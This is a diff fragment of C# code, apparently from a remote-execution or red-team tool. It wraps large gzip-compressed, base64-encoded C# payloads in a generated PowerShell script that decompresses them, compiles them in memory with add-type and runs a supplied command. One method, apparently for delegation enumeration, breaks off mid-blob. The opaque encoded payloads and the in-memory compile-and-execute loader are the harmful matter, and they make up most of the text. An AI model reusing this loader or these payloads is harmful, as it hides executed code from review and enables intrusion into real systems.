82		-	string csFile = "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";
	81	+	//string csFile = Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\System.cs"));
	82	+	string csFile = "H4sIAAAAAAAEAOU97XLbOJL/p2regVFd7UoThbGdVC6bmcydLNG2biRLI8rjycYpFUVCEtcUyeWHP3acJ7sf90j3CtcNgBRIApTkOLNzd/oRWWCj0V9oNBoN5r//87/S2PWX2tC1oyAOFol+6fqvjnTTWpAzy3c8En//7TcMxryPE7Iu/dS7gecRO3EDP9ZPiU8i1y6D9Fxr6Qdx4tplZHp/VG0BlOswInEMOMtPB67/93LbJPUTd030vp+QKAhNEt24doVu3SR2GrnJvT6OXN92Q8srQ0zJXSJr0ydkmXpWZNxlZFWQT1cRsRxogAfffuNbaxKHlk20LsAGHumE4dG33/yGzzT4hOncc20tTiyQiWZ7Vhxrxl1CfIqbwfzGvqrgfcNP1ySy5h75IU6Al+WPmhl6btJMVm6ssSb8amuun2h+a4NIwIkfd6E1TQqu9+Pz1PNGkbEOk/smdG5pDw+ar/2gHbaKnUo48JOsouBW88mt1omWQJufGHc2CdEmmq3vi/CfMxlkn4gkaeRrG6b0ieUvSfOgjTzoA+Ivk5X2ssCH7AP6RTtsutr7H2lPM50zWUDTd5rfBgwiMZ/Zn58LGmGqGEfBMrLWFT187Hlefx0GUdJsXJPIJx7MFMfzGq1PAhBj6J02tKJ4ZXmduHnhry3fWhJneh8S/TgIPLFDUbtgboBZmwOQ1gWbSghQA9YcN7livRCMCTpYKN5zMLS2lj+BiQMjOTBJoDUiC800uheT/vTDrDOdTvrHF1PDBDCOsZNAv3makLgOmFm2CEtpm/f9Fcz1hDuJtpaisTm3lGag7MSzltAKc3KcRIDG8G/cKPDROESC0yiClp4bgeqC6L6tfez7nxg1085kejHun5+MjF8B1EysKEnDvr8I2lqQJtp4MuoapjlDiMmwM+2Pzje8IVi0ppS0vhdNTqnDtmaSZGDFiRFFQaS915IoJVv1dAEMvjrSLi03OQkiE7jyyGj+NzREzvqKCqidQa5dz3NjYge+Ez8VZU9ochehw02upPdmrsm8aeDGSa73or5zGMECfrG8dPPbnpvuP8TH44jcuEEaF8G8cEJ5Q+A/oLj6vpu4lgfESUSG8lGKjUktb+wGqZ+3clniLMi7/0EF0AOnK7WXGub/eWxE7g1Yt5SPlPlUHvTkk9cM0sjOXPAZn8rFh+XWqRUtSVLqUtAlg8ge8QnUIzF4QadjYzfwg/VMyZxwjmpEl94ncy81C5QXxGWJMe/3VcfmQ41C4meLI+U85OsaF6FURAJc31FTaTk3Vuj+MyxR4GoaXBM/E2zJoPhyUrIaXBc5PO3MoJ+KzRqqT0lCBxTW3WaVkLY2Hf1knItL9qw76JimVu7cxUAsA4dQYNo3p/1uFY7bfLmZRY1MHhSArSKseUfb3JFzHqS5IWkK0g9XE/CG2FpQSri6BFskrL0mQIPnYsRFWXjSNbCGITNzTRJd8tnd1s46572BMTsZdE5N8DhDK76uNNJl7HcgeEzINQbCVNzlsIv/nKeLBYnyn/4x/V0IQeb3IGvUGtMMlTlt69xYrpeDHWPTgCySKey2hjDrYJLvzGR3ZUXAKPDH/9I7aRI8zgsifTDt+A5zlCZhmnTHza/qeflcimGvxtb7XNzs5/bB5QNLJQO74V2XgkFgwa5nHlnRfVO5cg7GsNmFpTPffZy4HkHDEbeFW6mXE9qG/btlJ2ZIILwH5BlbX7C8nbIgouM4mHTIBT0MnNTbbPpwLduPh6pzU67vzFmxhWdI1rBBy8ngrUKgfmzFhBPbphPn4yds5RMv92AFf+iF5+l6TqLRgk4rHC8h/h+Ml9xeHsvLFpva1SDYSjMB2pPy7KtyUN228+AQ9tH2dWnvRffWOb+bLZkVgWUlyLJ8d1/gno1YF1Rtd0DyabSbgn9xoyS1vJOIEOOuRjJlPkEkVBrZRhb6o7vY0wifkh1OGGeo43mBvRtHmYo3/CxYd6o05CpvBiwJj9P34lK+gu3h05j/4puGfGqx1q/ryNDd51LEH7mbyqIDHlT7hYk8DWhvZu0cQj7XefYq18vohkSeFYaEzwmBHViJUhvs5R6QNtnXT67v6Cb5e0p8zCnIRH3hu3bgyA0I8RWTZsq8L+8jAGtCdu17KbB8K1/Mp/6u/G3jjinKnsvZyQ0PghkS3RBnCxjss66TINwCNXUTjyjlB+Q4t7/WP/6wpTdO7S0YtoP8SrNNKPR4C65dAWE2eblhbAHFpUMJcvhGuzVXwe0lGEtwWwdmzzPVHW2x2N3gVmbi9H2IobdCsVB7KxhdCL5ggqhngSTzvcNsEBePeuLZSi6HYStMlmWvBcoCgq8iA8nGeZsMaNjGUgBbLCY7KoRZb0dumFA9Frtsyc9J8UsSUl9FNoOLfm+bMGgYMAhuIcZTmDKFOHOXqxLI09FZzu5soxn54qkeheFRCAhIVjg0i3pUoLiSv3kNAVroRiw8ctcK18XonH4YG2x01LMcMrfK/nBsTMzROctxDYxfjIEG8QuJ4sDnGaob4qkpw9TevW+tXRu971K1PhVBaaICj1BrgU+jIA2pY68FG0fuDcRIS1IDSsUNoZu7cEndRKc+v2oGxE/XgnCV6qdCB3rWsL2HaOGwLXlcEO5j6KhV3Tt0Hkr6MnfR8QP/fh2kMRB50JbD9B00zQU3Tgk3OaDIEMAdKeDwBGaZAb0SOC+4rCx9Joi8koStl/8FLKIq4VOTimVPciuSPh3d+hB2q5VN8cqe98jCSr2kZ9me7DE7mJE9oXugbeZD56YUL+4saB2L7CnEGRAB2QlxTNeRQpiseqTvqIXY8Z16mXEcEwI7FuLLuTRhbTkO7vog3UT2vJM6bjIOwPbvpWqJ3KXry54YHrnZ7CUlAAPXv4aFEP+s7S97eGbFmQjx+EpKuF063JcB8X2z+w8KgfvfWyKVeBHQ8NF1SgGxsmiJk01pGRd9fgQjeTYEbVhY3aCW+CBYBj5YTenZ0LrLTzboicjOjk2c7oW0/Du6riun+nngE4n36p+fGeAcJfMfYtGp0Z3OTiajIbiRkWmgr3qMAx6Lp3cUcBuxoFqk9e7g4PDk4OTkpCxZEq1dH8XAgOinTD9LqrFQVYQru1tuKyxzOAJnkbncvMfbuh6TIvrDsoALwDTfIEAflaFLp9UC6OsyaKGGqEBudYVKfk6DxNoAHR5IYITJt4E8qkD+nJLoXgr7Wg47cNfAtSPrAnRUCLn37VUU+LDXzUyAIlcYXlbeBW4lz+FA3Hne60x6s0n/9GxqzibGzxf9idHLhj1BfN/vi6OT9z/aoT9biWHt7Z+ez8aT/rAz+ZD1P9ypb+9iPOh3O1MjH3anbpsgJ+/4eqeOP18YGxLf7t5lZo4uJl0jV9Zugun9x4U5RcH80h8Yp4bJux/t1f10MroYZ11f79W1Z5x0LgZT3vftXn1N2KJDbNXnBnG4ozFwE2pKTetBFGkx0V5Dz2Aw63QxYyDHy83+QW6NDyWnWrK6B4lBFags/srMQIq1qu4HqSYf5Eqqw5kro5yJLeaMeVEXnnH3BoNqyt3Mi2vhMc1WKxcn8VQ5qKSLsjo5TM6D00fFsKZWKetfTvfrfyVR0NZowUuruSEkK5R9rh222mBv1GfC9+uDcgWu5CBsM0hGUFvgUfybD/P8kKXDM+7KY3D2mCTpcUjpNLN8EFBK6re1hnCk22ko8K/ydVtyNqaQ3EE7J0tk96CeISyVzkd7r/mp522vi+alzQvLi8tb8s/Fny9faph+eIEkuLF2eKDxElFd14uQ+Qm8h4lzWd0pJ7OtsRWxon8Yq7si9rV2uyLJCjZ1CWMLa+gdFEJlTGQ+G3ITQbw9GGCNeOXB4cFR5cEJ/2yXmSjoZ1JBKzriR6xHEyoSymCfv0RVDK1ueoSEzUOJfIvnkLKpVbTHu7cSJNvFIBHBDuyXmOFs46mkKnkjcZDUg0yDQrkNzZ7zgzJ+HmKzanS1i6S2DAZHJ12JUH4yZ8/Byg3fDvBuhd4xu/2+Dr6Dnro1+QDg8xpX/lVU8RIoxGebo78CjfY8c6L2XBfLxTJ6Cmpq7SB8VoejU/xYgd9swIbn2afN2SNYF/wLEy3QyB2x04Q8e6f9dvC50c7qBpE1PEOmd3Do+UGzJTPg3a11bwVz3eF+5SQK1gUdl0+e+WEIq5nKlASbOf6HWvF4uwglwrcvcX7ZCJSN10iKz5uFcSjTZaHcWJGG5k5TVBRDAj/XE9rUxAZExxqbm+HatJntOHWG/vXBX95kg7RzXtrs4L40KpdVlHnjRqNsxDhbyJ2LD2XKSqL7rXblBDu7P7R36YqQKw78VYt6ZMVlGgVi/HA2SpYkfipXe7KPvbIidsquMVemQJBX3E3Y8ZMcalOYNw2ybbUSmGogJOR6Qg+ai6WCBbsqOGX1DywNFAYvegklGaiZnAomRO1Pfypy8SitIGKmGV5bogatwUIlBXPjWqEY/EgWzexDwLIfPS6EOYnrK42qZmilvaFQRNH+SGd1jWiK1oTAaoNiRgwehVq10POTgoPcoqEf81HU1TQBEw074VvfFCbX8sO5eYSdcB/1nJHO78XByKohpbL9DCEjrmNNmTNko1D2aBwiu/kn/ly4vuV52/0fXcQ3LlvvxxS9s3tUKHSWUyahTr6MMinuESkVb/DRuwcWXnjLz893D5bYxh5R4PH/bHqGCYHN6fds3JkY57h5HvGdvjQJtQumYX/aP2XnQuMRbPM/iMj+VYrMC4CFrCyhC/ho7wqi2fFg1P1pdk6fdScjc3QynR33zzuTvmHOOoPLzgdzNjqn4/Hdy0EtA7Qe6GR2Adv7aY/luXPWD0opF2XPs9HlZf+8N7os5ImlPeNVEEHfy9lZv5cnzuSDMNBMJr8MZ6OxMWG3FCXZs5p+l5N+nqQ7ko9Fl0Tj16lx3jN6M6FICszBMMEs8iGV5FIUVHMG6GcmCuStVAkYchFe61gTvqoHy3NI7NigmCCs0UGps9kZGpv01iZ/LyE3tvht1SxIrNaQVAjO++i8dERgFyutRotmDqLuWyz6kIdRG2hZAQr0ESKNyvJUjcgVGRMGQPckaoi+X4+B76KqiYX8YILfv9Bs6gAd7W8pnXeabZVDhQwtdBVoq7Cr7sKIre0AlDHcWghxX/FZ6f5OISYUGvi2EcO/XFFt7S/0U9a79AZNAbF4JKfzwzUIBiSpGsrgbmQzQWyozve6X0Z0jqaG6Opco6WkfJ5J6tUq84zOT9e4y6amWMjarA4BkjmGjWMaEdxOxxBWJyuC2YI1wbpcLVjQBrHElRUdZT1g6gaLZmGYVintheToQmGsTpMR5ckPQIrsJL/yjGv9TuYsuWu6ZdaDFOgQsXbrep42J1pwQ6JbVo2MkVMp2sDYcQuPeRkkDK10BdJeWeF7jYuR9mPllNWO+2+V6S6ryvHukSIaIbtqXaswETxObX6yuutdcL6RPKLBP07NzeVu2SDIVDbIw0NOXoG+x+wHlBmk7KPcXlEtlgrBhYlB85xnp14wt7xmPW/7CE826n5SfMaH+32lBXO04zibF+y8CHzvXusNBnh1K2FvzpH3zN3IEGTDSrxYBYlK2Nwi6uSQ9aOTjFZANqv4208Xym/XvPqNE2p9SG1BDV4uHhA/2bHbjluhGkwSOW4fVlBZDbToOHaC+jrTQJniPskT27gS8+v12joXhxZSeTwy240f5fTik4S5/XzRFF8NwI9Kq+VFerE25kFSgaSXKm1aPDXcLq+sKrrxYA/fynSDyzTu7VLP0bDUEH0mvrfKo3GKlVmy5uED6OBgJVxwD1Jl75lCqNqXbWiL1K9xJsVg5KncB8A3Bcztgh7U6dD/JbO/mFKpnfobEfwfm/NfsvRlgS1/yxPm39l8wZnPG7NZ2tIrFyJkqM4J3lhgyKqTfPsEbvN7mZLpWyO98tthMo7apd3hhjwWk5Q2tTRWYeMrkh8P8sRG+fhxB73tn5oRP1+i9R0klu1UFfLKHv9/kNbLl48fu34bVrS9fVBsdmSPx5HvIUWVyvPu1cYKRn5tEPBJ87YP0kSwZLQKYuGyISJniV2pM6BJjX0yh1mnZN9OYU2uMawkGfGT1PRIpD3oJC2eTsiVi8e1ivWn0X13dcU0YF5dsRdhvjqCJirOeBzckshcEc+7uro51A+urkJsibFFJ3dEe4FVENr8PsR3Lr7wA3qO+eJWW7mOQ3xsCSFYlI+N3iKM654myqfMp8if1SbRHyoJchWawk5/b8HSfB1YqqorJvio+co8nao0ShW7o/ppMPZk1SmMhVqXKDnRLRQv5R5DvjC/fFllJ3MUtSH5piMip/3kI1TSTTWi3dSLcveXl1s0rAYWJ63pvzH919Ud+o1VjvWxzlx4s8CWqGhrijH7ZJBi6CQ9onqonEBtdj67CFqgznIcSQGo+MYehZieN3gpaKeBT2OXPgHS6TdehGIdWHvgKwXKa8lCK7FX3BfTpleqI3sK+fHgEz1Qel0+pytCHTKoV+XDqiLUEYPqlk/RchLxtHizLVLV6LapNNsMKf8qVK/NFa/RET9fKQlwzBw5cyPUdVz5j97sS0cWPQRKY8faTpvqvZm/k1iTVcns6zYV3BJ9GrAicTl70nAHYkDmcbMqgLgKI9ZcFk5lGu6iuSTJizUtp4ZFEbfRHlCqvbA8r/VbBOZzQ2SPT4LIJp+ls0Y92r/M37wGA/3zxBgPOl1jaPx5XwRBFl1C8P+CVagJ7/5m1s4q9fbFzHoVMRdfJ66f/tUNeRngx9Jonz6Csm9IlHx69w5LH/EdUG9ec2Ui2632xxI24e9h4BDo2CM2b2s9jnrAGd5PgyYX095YHIve4Poovr48K80E+tJk8RanYsYWGwWMthNF1j3Y7J7jueROo2M2yhcrNsZ9jWdTPCm4y7pPcasWfloRHScOEF59XK1BFYqHgevs76bsvXkyxnlxTm6yhbLY8mpfOOHNKNiK9YiiXZI7fYh+qsla29q/N5r/9sP7sanRKJuF1FdXMY+yf9RQ8ldU9K2P+sOV/3B1+XB1++m7RkunySjJuFVnxkmQC5vWoG94wjr0+jMnlQ8taZjj268yX1Iw8ciCspcvNazNl+Rd5SKQHnc9Vhb170uWDbUtFYu8ZBncXftLxCxDJ6Q1VdORKTdP+WM1Pr9OwgpAJBOentIWps6TWFYR5Y5cC7RsLls8FSk7X0ARfm6vzGeOvVksFCziQ6dP5zgtivd46cv7fP6PKtfRqj0gRBN6lN9lVOoTb3JEQgE+UMuaKlmOYldAvnvXjCKTJDBkUxy5BpQFnOJYVYOm1ZmuU8xS8z9JfHyPdePNhhdD2NdoweZAr7xZRh4sfgd7bNfJ9tIwQoXOQhoGAGBdbVTpE7Snn3hpvFLKhnK7BYbLb2MfW6W3MYwqbeV1snITgj95/r5gK0KwXAefK00Nz1eJoPxqrpr5dBOAsoeW6x/x1xDCFtGKlrG6BBe9BUJkdy0lJfsS7yCxio8vPmlDN6YHexb/L1OkgRdjq37d281uyV3oBRGJFKZbrEIGXMgnQG638EfZd1btXNQU//r8P/AcrL6WaAAA";
83	83		string function = @"
84	84		$b64 = '{0}'
85	85		$output = New-Object System.IO.MemoryStream
86	86		$Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
87	87		$Stream.CopyTo($output)
88	88		$data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
	89	+
	90	+	$data = $data.Replace('REPLACEME', '{1}')
89	91		add-type -Language CSharp $data
90		-
91		-	[ConsoleApp2.Program]::System('{1}')
	92	+	[ConsoleApp2.Program]::System()
92	93		";
93		-	return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
	94	+	return String.Format(function, csFile, CompressData(command));
94	95		}
95	96
96	97		public static string RunDelegationWalk(string command)
97	98		{
98		-	//string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\DelegWalk.cs"));
99		-	string csFile = "H4sIAAAAAAAEAN0923bbSHLvc878Q4/Onj1UTMOU7DPxejKTUCQoMcPbEKQ1juXwgEBTxAoEuLjosit/WR7ySfmFVF8ANIBuALQl7yZ4GJmNqu6q6uqq6qpuzP/813/HoeNdo7FjBX7obyLt0vFen2qGucEXpme7OPzp++8YjPEQRnhX+Kn1fNfFVuT4XqidYw8HjlUE6TvmteeHkWMVO9OG02LLyPH+Umybx17k7LA29CIc+HsDB7eOVaJMM7AVB070oM0Cx7OcvekWIRb4PpK1aXN8HbtmoN/vAxyGhJkS2DbApg0N8OL77zxzh8O9aWHUA1jfxd39/uT77/72/XcInn28dh0LWa4ZhmgW+NeBuWNvOAB5PvZdd7jb+0HUOrrBgYddkLvtukfHnwSgAEdx4L1DYzMIt6bbDVtLb2d65jW2Fw97rJ35visi8KHDyARxI2ANekZrAEI9oD/CQA1ILmyFUUCYc/dAOCCYZAInwFQbpW96/g5GsmFCoDXAG2ToveV8uPiw6i4W8+HZcqEbAMZ77EaAt44jHFYBMymKsJS29dDbguZEXOXaKHa8CNl3lGagbOCa19AK8z+LAuhG926dwPd22ItEguMggJa+E4BC+sFDG30cep8YNYvufLGcDSeDqf47gBqRGUTxfuht/Dby4wjN5tOebhgrAjEfdxfD6STjjYAFO0rJMZ3+2jlsIwNHIzOM9CDwA/QzioIY187TEhh8fYouTSca+IEBXLl4uv4zcNPirG+pgNoJ5M5xXSfElu/Z4VNR9oQqt9zbXOUK895KZzJtGjlhlM57fr5TGEED3ptunP221obzV/H1LMC3jh+HeTB3P6e8EeB/QHENPSdyTBeIk4iMyEcpNia1tLHnx17aymVJVkGK/g8qgD52sVRfKpj/+7EROLeg3VI+YmZTuQtNF6/hx4GVmOALvpTzL4utCzO4xlEBJTeXDCJ5xRdQH4dgBe2uRdDADlYzJTP